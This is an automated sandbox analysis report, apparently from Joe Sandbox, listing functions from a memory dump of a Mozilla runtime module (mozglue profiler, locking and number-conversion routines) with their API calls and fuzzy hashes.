Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: 109ea795bf88f770de8c81ce146167e0aed23e5b36796e877e521a29ad2fa7c6
Instruction ID: 869b131271debd6204515f66e8ff1b705b2e47cf531f929d38d54a0b4e471c7f
Opcode Fuzzy Hash: 109ea795bf88f770de8c81ce146167e0aed23e5b36796e877e521a29ad2fa7c6
Instruction Fuzzy Hash: 8FD17071A04B0A9FD708CF28C480B99F7F1BF89348F01866DD8599B751EB71A965CB81

Function 6C271720 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C2717B2
memset.VCRUNTIME140(?,00000000,?,?), ref: 6C2718EE
free.MOZGLUE(?), ref: 6C271911
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C27194C

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
String ID:
API String ID: 3725304770-0
Opcode ID: 1a3928127a2c75fde39948be2d8a2a87d8df9f22f70041df7ed75a122a9a3dda
Instruction ID: 97e18150d7dfb1df57f6f7976f48d0540e9f3ce98d91bc78f7effb02e5d0396c
Opcode Fuzzy Hash: 1a3928127a2c75fde39948be2d8a2a87d8df9f22f70041df7ed75a122a9a3dda
Instruction Fuzzy Hash: 4A819D70A112099FDB18CF68D8E49AEBBB5FF89314B04452CEC19AB754D730E985CBA1

Function 6C285C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C285D40
EnterCriticalSection.KERNEL32(6C2EF688), ref: 6C285D67
__aulldiv.LIBCMT ref: 6C285DB4
LeaveCriticalSection.KERNEL32(6C2EF688), ref: 6C285DED

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: 4cfdb41b043277da13228d827b392d434c1cf785f7102fec303fc606b8387b8d
Instruction ID: edf0b52df6a34d77cb99341a7199f0e1cad25cda81f4d25cad7c11f56a54c358
Opcode Fuzzy Hash: 4cfdb41b043277da13228d827b392d434c1cf785f7102fec303fc606b8387b8d
Instruction Fuzzy Hash: 53515175E0125A8FDF08CF68C858AAFBBB1FB89304F198629DC21B7790C7306945CB90

Function 6C2C7170 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C2C7250
EnterCriticalSection.KERNEL32(6C2EF688), ref: 6C2C7277
__aulldiv.LIBCMT ref: 6C2C72C4
LeaveCriticalSection.KERNEL32(6C2EF688), ref: 6C2C72F7

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: df5ef8f10967e20d01d7381737473a4ac8a20a5b8a0bde0a9579a874351eccad
Instruction ID: 26509696330cb7b26186e82074e6b07b45b3e4a467aa662a29d89f1a430d0527
Opcode Fuzzy Hash: df5ef8f10967e20d01d7381737473a4ac8a20a5b8a0bde0a9579a874351eccad
Instruction Fuzzy Hash: 5D511C71F0022A8FCF48CFA8C855AAFB7B1BB89714F198619DC25B7790C7316945CB91

Function 6C26CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C26CEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C26CEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C26CF4E

Strings

0, xrefs: 6C26CF30

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: 246501e7e9bb76e09c75b68f659df8de99d5c85d0fc4f843a8e5c21297708ddc
Instruction ID: ad55808ab7270ced805f1eef4284b7746242ba06141e5c852a51a3a204ece43e
Opcode Fuzzy Hash: 246501e7e9bb76e09c75b68f659df8de99d5c85d0fc4f843a8e5c21297708ddc
Instruction Fuzzy Hash: 1E513371A0025A8FCB00DF19C490A9ABBB5EF99300F19819DDC595F792D331ED46CBE0

Function 6C2C77D0 Relevance: 6.1, APIs: 4, Instructions: 113stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C2C77FA
?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6C2C7829

Part of subcall function 6C29CC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C2631A7), ref: 6C29CC45
Part of subcall function 6C29CC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C2631A7), ref: 6C29CC4E

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C2C789F
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C2C78CF

Part of subcall function 6C264DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C264E5A
Part of subcall function 6C264DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C264E97

Part of subcall function 6C264290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C2A3EBD,6C2A3EBD,00000000), ref: 6C2642A9

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
String ID:
API String ID: 2525797420-0
Opcode ID: 47d6eaaecf975e64b10bc5c370f3243e6696f60c3451788dd984227e0a1b4a86
Instruction ID: d08e965261700ab71c871ad7dbb5d3efcb5cde56d0fb04379e4b9663a7d7cdd4
Opcode Fuzzy Hash: 47d6eaaecf975e64b10bc5c370f3243e6696f60c3451788dd984227e0a1b4a86
Instruction Fuzzy Hash: 0E41AE71A0474A9BD300DF29C48056BFBF4FF8A654F204B2EE8A997680DB30D559CBD2

Function 6C2A6470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C2A82BC,?,?), ref: 6C2A649B

Part of subcall function 6C27CA10: malloc.MOZGLUE(?), ref: 6C27CA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C2A64A9

Part of subcall function 6C29FA80: GetCurrentThreadId.KERNEL32 ref: 6C29FA8D
Part of subcall function 6C29FA80: AcquireSRWLockExclusive.KERNEL32(6C2EF448), ref: 6C29FA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C2A653F
free.MOZGLUE(?), ref: 6C2A655A

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: 6c2710ba6c4c59c806708f274d296bb17f183b5789b320b7cb45ec40cff36bb5
Instruction ID: 3ea774e5373d29c3d3f12275fc556d30f7e412d78e04ce5c6287a0367cf6ac98
Opcode Fuzzy Hash: 6c2710ba6c4c59c806708f274d296bb17f183b5789b320b7cb45ec40cff36bb5
Instruction Fuzzy Hash: C9314FB5A043099FD744CF25D884A9ABBF4BF89714F10482EFC5A97741DB30E919CB92

Function 6C29FF60 Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6C2BD019,?,?,?,?,?,00000000,?,6C2ADA31,00100000,?), ref: 6C29FFD3
memcpy.VCRUNTIME140(00000000,?,?,?,6C2BD019,?,?,?,?,?,00000000,?,6C2ADA31,00100000,?,?), ref: 6C29FFF5
free.MOZGLUE(?,?,?,?,?,6C2BD019,?,?,?,?,?,00000000,?,6C2ADA31,00100000,?), ref: 6C2A001B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6C2BD019,?,?,?,?,?,00000000,?,6C2ADA31,00100000,?,?), ref: 6C2A002A

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 826125452-0
Opcode ID: a0726c7581034779497031510f1d78d3f6ccf7c1a19319c830d97678b53eda1c
Instruction ID: cc328b98b80ff3e4bb782214250ee58d974ca6be06ef643dcc4de0a83ca8fbdf
Opcode Fuzzy Hash: a0726c7581034779497031510f1d78d3f6ccf7c1a19319c830d97678b53eda1c
Instruction Fuzzy Hash: 7621D872E002195BD7189E79DCD48AFB7BAEB853247250338ED26D77C0EB70AD0586D1

Function 6C27B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C27B4F5
AcquireSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C27B502
ReleaseSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C27B542
free.MOZGLUE(?), ref: 6C27B578

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 5c0d25748e348af0d4ebb2f572f4e5aec22de58cb01acd1375b0b592c534ad30
Instruction ID: 8be0ad1410da6af3a6e7594e8144b3d28fec0a50ec14029a16abe9333b8aab0e
Opcode Fuzzy Hash: 5c0d25748e348af0d4ebb2f572f4e5aec22de58cb01acd1375b0b592c534ad30
Instruction Fuzzy Hash: 6D11E435914B49C7D7228F29D8487A2B3B0FFDA319F54571AEC4963A41EBB1B1C4C7A0

Function 6C2A3DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C26F20E,?), ref: 6C2A3DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C26F20E,00000000,?), ref: 6C2A3DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C2A3E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C2A3E0E

Part of subcall function 6C29CC00: GetCurrentProcess.KERNEL32(?,?,6C2631A7), ref: 6C29CC0D
Part of subcall function 6C29CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C2631A7), ref: 6C29CC16

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: d6c9b68bc3a5b3e3f63c0d5ca6445a4c43f274c65b3c91f21065451ea08069cd
Instruction ID: 81bef927bac0b39ebe4b241a7644f66011984b5a0dcff06a0c35a29d0af0b914
Opcode Fuzzy Hash: d6c9b68bc3a5b3e3f63c0d5ca6445a4c43f274c65b3c91f21065451ea08069cd
Instruction Fuzzy Hash: 64F0127150020C7BDB01AB95DC45DAB376DEF4AA24F054020FD0957741D735BD1586F7

Function 6C2B2050 Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C2B205B
AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6C2B201B,?,?,?,?,?,?,?,6C2B1F8F,?,?), ref: 6C2B2064
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C2B208E
free.MOZGLUE(?,?,?,00000000,?,6C2B201B,?,?,?,?,?,?,?,6C2B1F8F,?,?), ref: 6C2B20A3

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: a72e2c21119afc70ed7bfc092a18f023b854b9b9b5dc20d0d0d2020a51f7b228
Instruction ID: 5a02928a00fbca93db8c9e0124c4fb64e6638a91786ce1d17129c5af943e6ffb
Opcode Fuzzy Hash: a72e2c21119afc70ed7bfc092a18f023b854b9b9b5dc20d0d0d2020a51f7b228
Instruction Fuzzy Hash: 4EF0E9B51007049BD7118F16D88CB5BB7F8EF9E368F14052AFD0697751CB71A805CB99

Function 6C2B20B0 Relevance: 6.0, APIs: 4, Instructions: 28threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C2B20B7
AcquireSRWLockExclusive.KERNEL32(00000000,?,6C29FBD1), ref: 6C2B20C0
ReleaseSRWLockExclusive.KERNEL32(00000000,?,6C29FBD1), ref: 6C2B20DA
free.MOZGLUE(00000000,?,6C29FBD1), ref: 6C2B20F1

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: c13ea71eca81d01f1e908da78019cb4f2f3ada12abca6cabf3def9d36105e872
Instruction ID: df18b94b8fcb392112d8fea2e6994c3786d4d83f25d9db5280558106db3226ab
Opcode Fuzzy Hash: c13ea71eca81d01f1e908da78019cb4f2f3ada12abca6cabf3def9d36105e872
Instruction Fuzzy Hash: 01E0E575A107198BC2209F25D80C54EB7F9EF8A259B04062AEC0AA3B40DB75A54AC7D9

Function 6C2B85B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C2B85D3

Part of subcall function 6C27CA10: malloc.MOZGLUE(?), ref: 6C27CA26

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C2B8725

Strings

map/set<T> too long, xrefs: 6C2B8720

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Xlength_error@std@@mallocmoz_xmalloc
String ID: map/set<T> too long
API String ID: 3720097785-1285458680
Opcode ID: 9825e785005fd229b168bd5c4eff8f7c496d72c006336ec92ecf45b313375c7c
Instruction ID: 2b46745004a4346b209f1b649bb8c446214c622e2d3384adc52cacbd5ce6a6cf
Opcode Fuzzy Hash: 9825e785005fd229b168bd5c4eff8f7c496d72c006336ec92ecf45b313375c7c
Instruction Fuzzy Hash: 80514478A0064B8FD701CF18C184A56BBF1BF4A35CF19C19AE8596BB52C375E885CF92

Function 6C26BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C26BDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C26BE8F

Strings

0, xrefs: 6C26BE5B

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: 0b1396189e976a555cf3cc9dd15fda8fb431fd77abb35c455fadee9d39f069d9
Instruction ID: 5ff395a8e37e2098daf8a03ae25b5e92d04b0ff537fb652ad7b38a08817948a6
Opcode Fuzzy Hash: 0b1396189e976a555cf3cc9dd15fda8fb431fd77abb35c455fadee9d39f069d9
Instruction Fuzzy Hash: 0F41B175908749CFC711CF2AC48199BB7F4AF8A348F004A1DFD856BA51D730D9989BA2

Function 6C26F180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(?,?), ref: 6C26F19B

Part of subcall function 6C28D850: EnterCriticalSection.KERNEL32(?), ref: 6C28D904
Part of subcall function 6C28D850: LeaveCriticalSection.KERNEL32(?), ref: 6C28D971
Part of subcall function 6C28D850: memset.VCRUNTIME140(?,00000000,?), ref: 6C28D97B

mozalloc_abort.MOZGLUE(?), ref: 6C26F209

Strings

d, xrefs: 6C26F1F5

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CriticalSection$EnterLeavecallocmemsetmozalloc_abort
String ID: d
API String ID: 3775194440-2564639436
Opcode ID: fa9186f8cc5b68efaad36b4d4e6192ebe4e5ddee626876a065a67b64bad4d685
Instruction ID: 43b0631499a54adbd9f02acdf963f2d2de8e10287ec7c70cbb94d3362bbe5ccf
Opcode Fuzzy Hash: fa9186f8cc5b68efaad36b4d4e6192ebe4e5ddee626876a065a67b64bad4d685
Instruction Fuzzy Hash: 80113A36E0168E87DF04CF5DC9552FEB379EF56208B115129EC05ABA52EB30A9C4C7A0

Function 6C2A3CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2A3D19
mozalloc_abort.MOZGLUE(?), ref: 6C2A3D6C

Strings

d, xrefs: 6C2A3D58

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: fecb1b347934cb9eafb529aa3e15540028b1b7818098de2d5e4208cb06fc3a3f
Instruction ID: 8a60150974072b463af78ac7c97a23b987614b45225a709f1e8a7f6a93a1d69e
Opcode Fuzzy Hash: fecb1b347934cb9eafb529aa3e15540028b1b7818098de2d5e4208cb06fc3a3f
Instruction Fuzzy Hash: 9511C139E04A8DDBDB01CBA9C8184EDB775FF9A718B448218EC45AB652EB30E585C790

Function 6C274730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C2744B2,6C2EE21C,6C2EF7F8), ref: 6C27473E
GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C27474A

Strings

GetNtLoaderAPI, xrefs: 6C274744

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetNtLoaderAPI
API String ID: 1646373207-1628273567
Opcode ID: d117f92b536840eb374ff8d963f692fb52f887c35bb8d6448d3494e0c6c2c841
Instruction ID: b9378b9d88a016913ded9c9135cbdd404ed88302363780369afe8573102f0f70
Opcode Fuzzy Hash: d117f92b536840eb374ff8d963f692fb52f887c35bb8d6448d3494e0c6c2c841
Instruction Fuzzy Hash: 870192753003198FDF009F669888A297BB9EB4F321B050069ED05D7380CB74D801CFA1

Function 6C2C6DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

